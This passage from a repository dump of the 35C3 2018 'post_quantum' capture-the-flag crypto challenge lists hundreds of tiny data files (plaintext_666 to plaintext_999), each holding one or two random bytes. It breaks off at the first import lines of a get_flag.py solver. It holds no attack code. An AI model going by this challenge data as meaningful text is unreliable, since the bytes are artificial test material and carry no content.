2018/35c3-2018/crypto/post_quantum/data/plaintext_666 ================================================ # ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_667 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_668 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_669 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_670 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_671 ================================================ Vb ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_672 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_673 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_674 ================================================ z ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_675 ================================================ e ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_676 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_677 ================================================ Y ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_678 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_679 ================================================ I ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_680 ================================================ , ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_681 ================================================ p ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_682 ================================================ 0 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_683 ================================================ 6 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_684 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_685 ================================================ j ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_686 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_687 ================================================ - ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_688 ================================================ Tg ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_689 ================================================ . ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_690 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_691 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_692 ================================================ ح ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_693 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_694 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_695 ================================================ @s ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_696 ================================================ k ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_697 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_698 ================================================ $ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_699 ================================================ B ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_700 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_701 ================================================ XP ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_702 ================================================ P ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_703 ================================================ ӝ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_704 ================================================ T ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_705 ================================================ & ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_706 ================================================ h ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_707 ================================================ & ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_708 ================================================ = ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_709 ================================================ 1 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_710 ================================================ 8 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_711 ================================================ * ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_712 ================================================ ./ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_713 ================================================ : ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_714 ================================================ ? ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_715 ================================================ c ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_716 ================================================ C ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_717 ================================================ H ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_718 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_719 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_720 ================================================ _ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_721 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_722 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_723 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_724 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_725 ================================================ X ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_726 ================================================ @ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_727 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_728 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_729 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_730 ================================================ V ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_731 ================================================ O ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_733 ================================================ 0 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_734 ================================================ Gw ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_735 ================================================ k ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_736 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_737 ================================================ Y ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_738 ================================================ : ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_739 ================================================ d ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_740 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_741 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_742 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_743 ================================================ O ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_744 ================================================ c ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_745 ================================================ r ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_746 ================================================ ۼ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_747 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_748 ================================================ 7 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_749 ================================================ è ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_750 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_751 ================================================ /D ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_752 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_753 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_754 ================================================ E ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_755 ================================================ f ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_756 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_757 ================================================ u ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_758 ================================================ gw ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_759 ================================================ 0 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_760 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_761 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_762 ================================================ ;= ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_763 ================================================ w ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_764 ================================================ D ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_765 ================================================ = ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_766 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_767 ================================================ y ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_768 ================================================ M ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_769 ================================================ t~ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_770 ================================================ j ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_771 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_772 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_773 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_774 ================================================ W ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_775 ================================================ 5t ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_776 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_777 ================================================ ? ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_778 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_779 ================================================ 5 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_780 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_781 ================================================ @ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_782 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_783 ================================================ } ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_784 ================================================ U ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_785 ================================================ I ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_786 ================================================ H ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_787 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_788 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_789 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_790 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_791 ================================================ W ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_792 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_793 ================================================ # ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_794 ================================================ D ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_795 ================================================ NK ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_796 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_797 ================================================ cC ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_798 ================================================ XJ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_799 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_800 ================================================ J ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_801 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_802 ================================================ x[ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_803 ================================================ *B ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_804 ================================================ l ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_805 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_806 ================================================ < ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_807 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_808 ================================================ ص ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_809 ================================================ Tv ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_810 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_811 ================================================ l ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_812 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_813 ================================================ R ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_814 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_815 ================================================ l ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_816 ================================================ ! ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_817 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_818 ================================================ 6 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_819 ================================================ R ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_820 ================================================ # ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_821 ================================================ i} ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_822 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_823 ================================================ a ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_824 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_825 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_826 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_827 ================================================ ا ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_828 ================================================ %\ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_829 ================================================ L ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_830 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_831 ================================================ H ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_832 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_833 ================================================ J ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_834 ================================================ Z ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_835 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_836 ================================================ " ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_837 ================================================ ? ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_838 ================================================ 1 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_839 ================================================ ! ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_840 ================================================ " ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_841 ================================================ G ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_842 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_843 ================================================ ը ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_844 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_845 ================================================ ' ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_846 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_848 ================================================ 2 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_849 ================================================ O ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_850 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_851 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_852 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_853 ================================================ j ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_854 ================================================ M ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_855 ================================================ hB ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_856 ================================================ ۾ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_857 ================================================ 6 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_858 ================================================ O ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_859 ================================================ e ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_860 ================================================ ` ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_861 ================================================ WS ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_862 ================================================ } ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_863 ================================================ ڐ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_864 ================================================ Q ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_865 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_866 ================================================ =n ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_867 ================================================ G ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_868 ================================================ WX ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_869 ================================================ 1 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_870 ================================================ ζ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_871 ================================================ . ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_872 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_873 ================================================ 6 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_874 ================================================ Į ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_875 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_876 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_877 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_878 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_879 ================================================ M ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_880 ================================================ { ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_881 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_882 ================================================ `C ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_883 ================================================ n ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_884 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_885 ================================================ @ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_886 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_887 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_888 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_889 ================================================ z ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_890 ================================================ $ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_891 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_892 ================================================ = ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_893 ================================================ ? ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_894 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_895 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_896 ================================================ j ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_897 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_898 ================================================ / ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_899 ================================================ ۦ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_900 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_901 ================================================ P ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_902 ================================================ & ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_903 ================================================ $ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_904 ================================================ g ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_905 ================================================ 8 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_906 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_907 ================================================ J ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_908 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_909 ================================================ ' ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_910 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_911 ================================================ d ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_912 ================================================ E ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_913 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_914 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_915 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_916 ================================================ 1# ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_917 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_918 ================================================ ' ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_919 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_920 ================================================ O ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_921 ================================================ ^ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_922 ================================================ 6 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_923 ================================================ ԧ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_924 ================================================ = ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_925 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_926 ================================================ 6j ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_927 ================================================ p ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_928 ================================================ 1 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_929 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_930 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_931 ================================================ kH ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_932 ================================================ , ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_933 ================================================ O ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_934 ================================================ < ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_935 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_936 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_937 ================================================ 3 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_938 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_939 ================================================ f ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_940 ================================================ R ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_941 ================================================ -~ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_942 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_943 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_944 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_945 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_946 ================================================ ǘ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_947 ================================================ O ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_948 ================================================ s ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_949 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_950 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_951 ================================================ F ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_952 ================================================ e ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_953 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_954 ================================================ & ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_955 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_956 ================================================ "/ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_957 ================================================ 6j ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_958 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_959 ================================================ $ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_960 ================================================ R ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_961 ================================================ @ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_962 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_963 ================================================ ̅ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_964 ================================================ = ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_965 ================================================ i ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_966 ================================================ > ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_967 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_968 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_969 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_970 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_971 ================================================ j ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_972 ================================================ 0 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_973 ================================================ 7 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_974 ================================================ . ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_975 ================================================ ڂ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_976 ================================================ Ԭ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_977 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_978 ================================================ 5 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_979 ================================================ _ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_980 ================================================ * ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_981 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_982 ================================================ 8 ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_983 ================================================ [ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_985 ================================================ ? ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_986 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_987 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_988 ================================================ a ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_989 ================================================ ά ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_990 ================================================ ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_991 ================================================ u ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_992 ================================================ M ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_993 ================================================ ? ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_994 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_995 ================================================ k ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_996 ================================================ t ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_997 ================================================  ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_998 ================================================ r ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/data/plaintext_999 ================================================ › ================================================ FILE: 2018/35c3-2018/crypto/post_quantum/get_flag.py ================================================ #!/usr/bin/env python3 from challenge import CodeBasedEncryptionScheme from BitVector 